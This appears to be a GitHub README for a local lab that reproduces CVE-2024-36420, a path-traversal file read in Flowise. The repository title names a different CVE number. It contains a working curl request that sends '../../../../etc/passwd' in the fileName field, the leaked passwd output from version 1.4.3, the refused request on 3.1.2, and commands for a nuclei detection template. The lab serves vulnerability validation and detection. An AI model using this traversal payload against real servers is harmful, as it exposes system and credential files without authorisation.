junn34/POC_CVE-2024-10829
# POC_CVE-2024-36420
Local reproduction lab and nuclei template draft for `CVE-2024-36420` affecting Flowise.
## Summary
`CVE-2024-36420` is an arbitrary file read in Flowise caused by unsanitized use of the `fileName` body parameter in:
- `POST /api/v1/openai-assistants-file`
This lab was used to validate:
- vulnerable behavior on `flowiseai/flowise:1.4.3`
- denied behavior on newer `flowiseai/flowise:3.1.2`
## References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
- GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/
## Files
- `docker-compose.yml`
- `docker-compose.latest.yml`
- `CVE-2024-36420.yaml`
## Vulnerable Test
Start Flowise `1.4.3`:
```bash
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise
```
Manual verification:
```bash
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'
```
Observed vulnerable response:
```http
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...
```
## Newer-Version Control
Start newer Flowise `3.1.2`:
```bash
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise
```
Manual verification:
```bash
curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'
```
Observed newer-version response:
```http
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}
```
## Nuclei
Validate the template:
```bash
nuclei -duc -validate -t CVE-2024-36420.yaml
```
Run against the vulnerable target:
```bash
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml
```
Expected behavior:
- `1.4.3`: match
- `3.1.2`: no match
## Notes
- The version gap is acceptable because this repo only claims observed behavior:
  - vulnerable on `1.4.3`
  - denied on `3.1.2`
- It does not claim the exact patched version boundary.
- No real-world targets were used.